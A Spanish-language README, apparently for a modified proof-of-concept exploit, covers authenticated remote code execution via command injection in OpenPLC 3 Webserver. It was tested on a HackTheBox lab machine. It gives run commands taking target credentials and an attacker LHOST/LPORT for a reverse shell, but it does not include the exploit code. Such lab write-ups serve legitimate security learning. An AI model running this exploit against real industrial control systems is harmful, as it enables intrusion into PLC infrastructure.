
OpenPLC 3 WebServer - Ejecución Remota de Código Autenticada
OpenPLC 3 WebServer Ejecución Remota de Código Autenticada.
La presencia de Inyección de Comandos en Open PLC Webserver v3 permite a atacantes remotos ejecutar código arbitrario. Solo probado en la máquina HTB Wifinetictwo.htb.
Encontré problemas con todos los scripts que explotaban la vulnerabilidad, quizás porque uso parrot o mi navegador, chromium funciona para iniciar sesión, tuve problemas de inicio de sesión con Firefox y algo extraño sucede con el servidor web con la solicitud POST para iniciar sesión. He modificado el script de thewhiteh4t hay partes (principalmente el método de subida) que están simplemente copiadas, pero he cambiado la parte que obtiene las cookies del servidor para lanzar el exploit.
El PoC original es proporcionado por Fellipe Oliveira
Espero que te ayude si tienes problemas con él.
pip3 install requests
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx
Alternativamente, puedes modificar exploit.py
...
# LHOST y LPORT por defecto
LHOST = '10.10.1.1'
LPORT = '4444'
...
python3 exploit.py http://10.129.x.x:8080 user pass